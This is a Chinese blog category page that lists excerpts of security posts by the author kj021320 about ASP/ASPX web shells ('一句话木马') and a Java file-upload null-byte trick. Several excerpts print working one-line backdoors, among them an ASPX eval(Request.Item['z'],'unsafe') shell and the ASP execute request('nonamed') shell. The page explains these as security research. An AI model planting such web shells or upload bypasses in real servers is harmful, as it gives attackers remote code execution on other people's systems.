随笔分类 -  .NET-other

摘要：<%@ Page Language="C#" Buffer="true" ValidateRequest="false" aspcompat="true" %><html><head></head><body>test</body></html><script runat="server"> void kj() { Response.Write("</script>") 阅读全文

摘要：author : kj021320 近日来经过团队的一些意见，继续完善ASPXSHELL的BUG以及新加入功能，搞到数据库的地方...当然二话不说，直接去下了官方的ADO.NET 手册翻了翻！要做数据库控制，当然要做基础的2件事了。1. 遍历元数据2. 所有SQL语句操作那怎么去做这个 遍历元数据呢？打开文档找到OdbcConnection的GetSchema 方法！看了看帮助感觉很不错 抬头一瞄，发现有句很明显的鸟话！注意：此方法在 .NET Framework 2.0 版中是新增的。我操了！那就是.NET 1.1的不支持！再找到OleDbConnection这个类，发觉GetSchema一 阅读全文

摘要：AUTHOR:kj021320TEAM: I.S.T.OJAVA WEB文件上传 是取用户提交的文件名字而不是从random取随机器数字 就值得注意了跟以前ASP+ADO.STREAM的上传漏洞同理因为 WINDOWS平台不支持 带有/00字符的文件目录或者文件名字所以 JAVA虽然与平台无关 但是他底层操作的时候必定是调用平台的API 所以就会难免有些与平台关联的安全隐患或者漏洞令 JAVA语言开发者不能一一顾及周全 OK 下面是一个简单的代码例子String filepath="c://kj021320.jsp"+(char)0+".txt";Sys 阅读全文

摘要：Author : kj021320Team : I.S.T.O信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)服务器端 一句话为<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["z"],"unsafe"));%>这个一句话不用说了！我之前已经发表文章讲解过！client端HTML页面代码如下<html> 阅读全文

摘要：首先回顾一下以前ASP一句话的经典木马吧！<%if request("nonamed")<>"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的！网上也有例子我就不多说了！.....然后解析语言终究发展成为中间代码例如java .net 动态执行也就不存在了！之前ASP中正常情况只支持VBS JSCRIPT(像python perls 阅读全文